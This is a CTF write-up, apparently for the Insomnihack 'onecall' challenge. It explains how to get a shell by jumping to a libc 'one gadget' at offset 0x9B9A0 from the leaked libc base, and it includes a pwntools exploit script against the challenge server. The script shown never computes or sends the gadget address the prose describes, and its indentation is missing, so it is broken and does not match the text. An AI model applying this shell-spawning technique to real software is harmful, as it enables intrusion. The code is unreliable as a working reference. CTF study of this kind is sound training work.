Rating: 4.0

Under x86/x64 there are so called "magic addresses" or "one gadgets" that allow you to get a shell just by jumping to that specific address within libc. You don't have to set up stack arguments, you just need to jump there [1] [2]. For this challange we tried to find such an address as well but did have problems finding it within `do_system` (called by `system` within libc). After a while we looked for different addresses where the string `'/bin/sh"` was used (e.g., via IDA `x` key on the string `"/bin/sh"`) and we found a working address near that address at `0x9B9A0`. This means we just have to get the libc base address from the provided memory mappings and add `0x9B9A0` to it to get the final address. All is left is to send the program this address and it jumps to it (`BLR X1` at `0x40097C` within the `onecall` binary).

That's all!

Here is the full code:

#!/usr/bin/env python2

from pwn import *
import struct

p = remote("onecall.teaser.insomnihack.ch", 1337)

mapping = p.recvuntil("Where do we go from here ?").split("\n")


for line in mapping:
if "libc.so.6" in line:
LIBC_BASE = int(line.split("-")[0], 16)

response = p.recvline()
p.sendline("cat flag.txt")
response = p.recvline()
print("The flag: {}".format(response))

[1] https://github.com/m1ghtym0/magic_gadget_finder

[2] https://github.com/david942j/one_gadget